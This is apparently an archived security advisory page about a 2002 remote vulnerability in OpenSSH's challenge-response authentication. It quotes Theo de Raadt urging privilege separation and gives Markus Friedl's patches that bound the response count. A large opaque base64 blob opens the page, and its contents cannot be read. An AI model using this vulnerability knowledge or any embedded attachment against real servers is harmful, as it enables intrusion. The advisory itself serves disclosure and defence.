
	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

	

	

	

SOLUTION

	Post from Theo:
	

	I can say that when OpenSSH\'s sshd(8) is running with priv  seperation,
	the bug cannot be exploited.
	

	OpenSSH 3.3p was released a few days ago, with various improvements  but
	in particular, it significantly improves the Linux and  Solaris  support
	for priv sep. However, it is not yet perfect. Compression is disabled  on
	some  systems,  and  the  many  varieties  of  PAM  are  causing   major
	headaches.
	

	However, everyone should update to OpenSSH 3.3 immediately,  and  enable
	priv  seperation  in  their  ssh  daemons,  by  setting  this  in   your
	/etc/ssh/sshd_config file:
	

	

		UsePrivilegeSeparation yes

	

	

	Depending  on  what  your  system  is,  privsep  may  break   some   ssh
	functionality. However, with privsep turned on, you are immune  from  at
	least one remote hole.  Understand?
	

	3.3 does not contain a fix for this upcoming bug.
	

	If priv seperation does not work on your operating system, you  need  to
	work with your vendor so that we get patches to make  it  work  on  your
	system. Our developers are swamped enough without trying to support  the
	myriad of PAM and other issues which exist in various systems. You  must
	call on your vendors to help us.
	

	Basically, OpenSSH sshd(8) is something like 27000 lines of code. A  lot
	of that runs as root. But when UsePrivilegeSeparation  is  enabled,  the
	daemon splits into two parts. A part  containing  about  2500  lines  of
	code remains as root, and  the  rest  of  the  code  is  shoved  into  a
	chroot-jail without any privs. This makes the daemon less vulnerable  to
	attack.
	

	We\'ve been trying to warn vendors about 3.3 and the need  for  privsep,
	but they really have not heeded  our  call  for  assistance.  They  have
	basically ignored us. Some, like Alan Cox,  even  went  further  stating
	that privsep was not being worked on because \"Nobody provided any  info
	which proves the problem, and many people  dont  trust  you  theo\"  and
	suggested I \"might be  feeding  everyone  a  trojan\"  (I  think  I\'ll
	publish that letter -- it is just so funny).  HP\'s  representative  was
	downright rude, but that is OK because Compaq is  retiring  him.  Except
	for Solar Designer,  I  think  none  of  them  has  helped  the  OpenSSH
	portable  developers  make  privsep  work  better  on   their   systems.
	Apparently Solar Designer is the only person who  understands  the  need
	for this stuff.
	

	So, if vendors would JUMP  and  get  it  working  better,  and  send  us
	patches IMMEDIATELY, we can perhaps make  a  3.3.1p  release  on  Friday
	which supports these systems better. So send patches by  Thursday  night
	please. Then on Tuesday  or  Wednesday  the  complete  bug  report  with
	patches (and exploits soon after I am sure) will hit BUGTRAQ.
	

	Let me repeat: even if the bug exists in a privsep\'d sshd,  it  is  not
	exploitable. Clearly we cannot yet publish what the bug is,  or  provide
	anyone with the real patch, but we can try to  get  maximum  deployement
	of privsep, and  therefore  make  it  hurt  less  when  the  problem  is
	published.
	

	So please push your vendor to get us maximally working  privsep  patches
	as soon as possible!
	

	We\'ve given most vendors since Friday last week until Thursday  to  get
	privsep working well for you so that when  the  announcement  comes  out
	next week their customers are immunized. That  is  nearly  a  full  week
	(but they have already wasted a weekend and a Monday).  Really  I  think
	this is the best we can hope to do (this thing will eventually leak,  at
	which point the details will be published).
	

	Customers can judge their vendors by how they respond to this issue.
	

	OpenBSD and NetBSD users should also update to OpenSSH 3.3  right  away.
	On OpenBSD privsep works flawlessly, and I have  reports  that  is  also
	true on NetBSD.  All  other  systems  appear  to  have  minor  or  major
	weaknesses when this code is running.
	

	

	 Update (27 June 2002)

	 ======

	

	Solar Designer adds : for the privilege-separated OpenSSH  sshd,  please
	refer to Niels Provos\' web page on the topic:
	

		http://www.citi.umich.edu/u/provos/ssh/privsep.html

	

	

	Patch provided by Markus Friedl :
	

	

	Index: auth2-chall.c

	===================================================================

	RCS file: /cvs/src/usr.bin/ssh/auth2-chall.c,v

	retrieving revision 1.18

	diff -u -r1.18 auth2-chall.c

	--- auth2-chall.c	19 Jun 2002 00:27:55 -0000	1.18

	+++ auth2-chall.c	26 Jun 2002 09:37:03 -0000

	@@ -256,6 +256,8 @@

	 

	 	authctxt->postponed = 0;	/* reset */

	 	nresp = packet_get_int();

	+	if (nresp > 100)

	+		fatal(\"input_userauth_info_response: nresp too big %u\", nresp);

	 	if (nresp > 0) {

	 		response = xmalloc(nresp * sizeof(char*));

	 		for (i = 0; i < nresp; i++)

	

	B:

	

	Index: auth2-pam.c

	===================================================================

	RCS file: /var/cvs/openssh/auth2-pam.c,v

	retrieving revision 1.12

	diff -u -r1.12 auth2-pam.c

	--- auth2-pam.c	22 Jan 2002 12:43:13 -0000	1.12

	+++ auth2-pam.c	26 Jun 2002 10:12:31 -0000

	@@ -140,6 +140,15 @@

	 	nresp = packet_get_int();	/* Number of responses. */

	 	debug(\"got %d responses\", nresp);

	 

	+

	+	if (nresp != context_pam2.num_expected)

	+		fatal(\"%s: Received incorrect number of responses \"

	+		    \"(expected %u, received %u)\", __func__, nresp,

	+		    context_pam2.num_expected);

	+

	+	if (nresp > 100)

	+		fatal(\"%s: too many replies\", __func__);

	+

	 	for (i = 0; i < nresp; i++) {

	 		int j = context_pam2.prompts[i];

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH